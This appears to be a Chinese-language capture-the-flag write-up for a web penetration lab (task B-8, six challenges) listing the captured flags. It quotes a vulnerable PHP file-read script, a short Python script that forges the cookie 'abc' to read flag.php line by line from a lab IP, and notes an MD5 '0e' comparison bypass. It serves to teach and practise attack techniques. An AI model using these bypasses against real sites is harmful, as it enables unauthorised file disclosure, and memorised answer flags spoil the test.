B-8:网页渗透
任务环境说明:
服务器场景:Server2127(关闭链接)
服务器场景操作系统:未知
1.访问服务器网站目录1,根据页面信息完成条件,将页面中的flag提交;
2.访问服务器网站目录2,根据页面信息完成条件,将页面中的flag提交;
3.访问服务器网站目录3,根据页面信息完成条件,将页面中的flag提交;
4.访问服务器网站目录4,根据页面信息完成条件,将页面中的flag提交;
5.访问服务器网站目录5,根据页面信息完成条件,将页面中的flag提交;
6.访问服务器网站目录6,根据页面信息完成条件,将页面中的flag提交;
1.访问服务器网站目录1,根据页面信息完成条件,将页面中的flag提交;
Flag: tXZ1YNjY
2.访问服务器网站目录2,根据页面信息完成条件,将页面中的flag提交;
flag:BS3yfqvJ
3.访问服务器网站目录3,根据页面信息完成条件,将页面中的flag提交;
flag:vSuHmpFn
4.访问服务器网站目录4,根据页面信息完成条件,将页面中的flag提交;
flag:aq6yF68q
5.访问服务器网站目录5,根据页面信息完成条件,将页面中的flag提交;
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&file=ZmxhZy50eHQ");
$file_list = array(
'0' =>'flag.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['abc']) && $_COOKIE['abc']=='abc'){
$file_list[2]='flag.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>
参考:https://www.jianshu.com/p/6d67a3eca18e?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation
import requests,sys
cookies = {'abc': 'abc'}
for i in range(0,20):
url="http://192.168.14.212/5/index.php?line="+str(i)+"&filename=ZmxhZy5waHA="
flag = requests.get(url, cookies=cookies)
print(flag.text)
flag:9NIFVXvF
6.访问服务器网站目录6,根据页面信息完成条件,将页面中的flag提交;
0e绕过
常见md5开头为0e:
https://blog.csdn.net/qq_38603541/article/details/97108663
flag:A8And81y